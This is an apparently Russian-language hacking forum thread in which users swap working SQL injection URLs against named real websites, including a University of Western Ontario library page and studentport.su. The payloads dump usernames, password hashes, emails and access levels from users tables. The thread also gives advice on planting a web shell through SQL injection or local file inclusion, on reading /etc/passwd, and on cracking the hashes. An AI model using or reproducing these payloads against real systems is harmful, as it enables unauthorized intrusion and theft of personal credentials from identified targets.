Что-то я не до конца догоняю,нужен хэлп...) Есть уязвимость, дб 5 версии Code: http://www.lib.uwo.ca/news/view.php?id=-664'+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9/* Есть таблица 'users'(в других пусто), в ней колонки 'id,username,passwd,name,uwoemail,auth_type,auth_level,auth_status', но выводит только 'username,auth_type,auth_level,auth_status'(в остальных пишет ошибку) rgraves2:script:su:enabled Code: http://www.lib.uwo.ca/news/view.php?id=-664'+union+select+1,concat_ws(0x3a,username,auth_type,auth_level,auth_status),3,4,5,6,7,8,9+from+users+limit+0,1/* Что за херь?! Хэлп!
в других БД значит вот например здесь есть: Code: http://www.lib.uwo.ca/news/view.php?id=-664'+union+select+1,concat_ws(0x3a,passwd,username,auth_type,auth_level,auth_status),3,4,5,6,7,8,9+from+calculator.users+limit+0,1/* еще в dissertations.users есть
Code: http://www.lib.uwo.ca/news/view.php?id=-664' union select 1,COUNT(TABLE_SCHEMA),3,4,5,6,7,8,9 from information_schema.tables WHERE table_name='users' limit 0,1/* тебе это ни о чем не говорит? Мне например что таблиц users всего 4-е штуки и находятся они в 4-ех разных базах... Code: http://www.lib.uwo.ca/news/view.php?id=-664' union select 1,COUNT(COLUMN_NAME),3,DATABASE(),5,6,7,8,9 from information_schema.COLUMNS WHERE table_name='users' AND TABLE_SCHEMA='feeds' limit 0,1/* Это же о том что в этой таблице 7 столбцов, ты написал 8 ... Эти столбцы: "username,fname,lname,email,auth_level,auth_status,auth_type" Ну и вот вывод: Code: http://www.lib.uwo.ca/news/view.php?id=-664' union select 1,CONCAT_WS(':',username,fname,lname,email,auth_level,auth_status,auth_type),3,DATABASE(),5,6,7,8,9 from users/*
что можно сделать если на сайте есть скуль-инж. Я могу выводить в браузер данные юзеров. (мне их данные не нужны, админки нет). Если я впишу <? include("http://shell"); ?> а потом выведу его на экран, он не выполнится как пхп код? или выполнится? Почему? --- как можно заливать шелл с помощью скуль-инж в мускул сервере 5 версии? Load_File() не работает
через into oufile еще можно... но видимо, т.к. привилегий file у юзера нет, то и это не прокатит. кстати, load_file нужен для чтения файлов, а не записи)
Есть SQL-инъекция в запросе INSERT. Можно ли туда как-нибудь всунуть union или просто select? (кроме "on duplivate key..." и вставки ещё одного ряда) Спасибо.
SpYeR нет (читатай раздел статьи) Girsoft Куда впишешь? каким образом ты введешь на экран? Piflit Ответ ты можешь скачать в интренете и посмотреть
на сайте есть форма, всё введённое в неё добавляется в базу данных мускул 5 версии.(без фильтрации) есть скуль иньекция в (index.php?id=999+union+select+1,2,3,4/*) и я могу вывести на экран инфу, что я ввёл в форму (и то что другие ввели тоже, коненчо) (столбец 3 выводится на экран)
тоесть шелл через скулиньекцию можно залить только если file_priv() включён? (если исключить нестандартные ситуации, например что инклудятся файлы имя которых берётся из БД) И ещё один вопрос: на сайте есть уязвимость (локальный инклуд) index.php?menu=../../../../../etc/passwd%00 На страницу выводятся пароли. От чего это пароли? Чем их расшифровать? Куда их вводить когда расшифровал? ВСЕМ УЧАСНИКАМ ТЕМЫ ОГРОМНЫЙ РЕСПЕКТ ЗА ПОМОЩЬ ЛЮДЯМ!!!
очень странно, что ты нашел там пароли, пароли эти например от ssh или ftp 99% "расшифровать" их можно с помощью passwordpro или jtr... но я опять же сомневаюсь, что хеши паролей там есть... про локальный инклюд читай здесь:http://forum.antichat.ru/showpost.php?p=495764&postcount=535
как фильтрацию обойти ? http://fun2fon.ru/index.php?cntsearch=' http://fun2fon.ru/index.php?cntsearch=-1+union+select+1/* что вообще можно сделать?
Да, толькое если есть файл прив. Иначе никак. Как таковые, эти пароли не особо нужны. Но, можно методом тыка найти довольно нужные файлы конфигов. Так же, просизвести локал инклуд. Т.е. если на том сайте где ты нашёл этот инклуд, есть загрузка каких либо файлов, то загружаешь этот файл с кодом шелла внутри, и уже инклудишь этот файл. Считай шелл у тебя на руках. Рекомендуется к прочтению (и копипасту:d): https://forum.antichat.ru/thread49775.html Хотя может это просто читалка файлов, выгоды от неё конечно меньше, т.к. код не интерпретируется, но и с неё можно получить выгоду.
вот искал рефераты на тему алюминия... Code: http://studentport.su/referats/referat.php?id=23968 http://studentport.su/referats/referat.php?id=-1' http://studentport.su/referats/referat.php?id=-1+order+by+11/* http://studentport.su/referats/referat.php?id=-1+union+selct+1,2,3,4,5,6,7,8,9,10,11/* помогите плииз
А в чем сложность? это mssql Code: http://studentport.su/referats/referat.php?id=1+or+1=@@version Code: http://studentport.su/referats/referat.php?id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--
У меня вопрос, почему при таком запросе ругается ? Code: http://studentport.su/referats/referat.php?id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('page'))-- Code: Warning: mssql_query() [function.mssql-query]: message: Line 1: Incorrect syntax near '\'. (severity 15) in c:\inetpub\wwwroot\referats\globals.php on line 86